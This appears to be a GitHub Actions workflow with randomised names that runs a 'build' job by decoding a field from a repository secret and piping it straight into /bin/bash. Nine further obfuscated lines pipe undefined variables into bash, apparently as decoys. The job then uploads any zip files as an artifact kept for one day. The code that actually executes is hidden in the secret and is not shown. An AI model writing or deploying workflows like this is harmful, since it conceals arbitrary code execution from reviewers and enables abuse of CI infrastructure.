name: sloaneiris4803
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sloaneiris4803
        env:
          x457: ${{ secrets.x457 }}
        run: |
          printf '%s' "$x457" | jq -r .sc02 | /bin/bash
          echo $tjegx21979 | jq -r .buy64 | /bin/bash
          printf '%s' "$yj72785" | jq -r .ba5126 | /bin/bash
          printf '%s' "$c994" | jq -r .hxo3 | /bin/bash
          echo $ahq9806 | jq -r .r1 | /bin/bash
          printf '%s' "$ch678" | jq -r .ukvl4365 | /bin/bash
          echo $ccrgd05 | jq -r .e8 | /bin/bash
          echo $h5308 | jq -r .gg4 | /bin/bash
          printf '%s' "$fmgh7" | jq -r .pador2 | /bin/bash
          printf '%s' "$h805" | jq -r .q42507 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: Iptwr2eG
          path: "*.zip"
          retention-days: 1
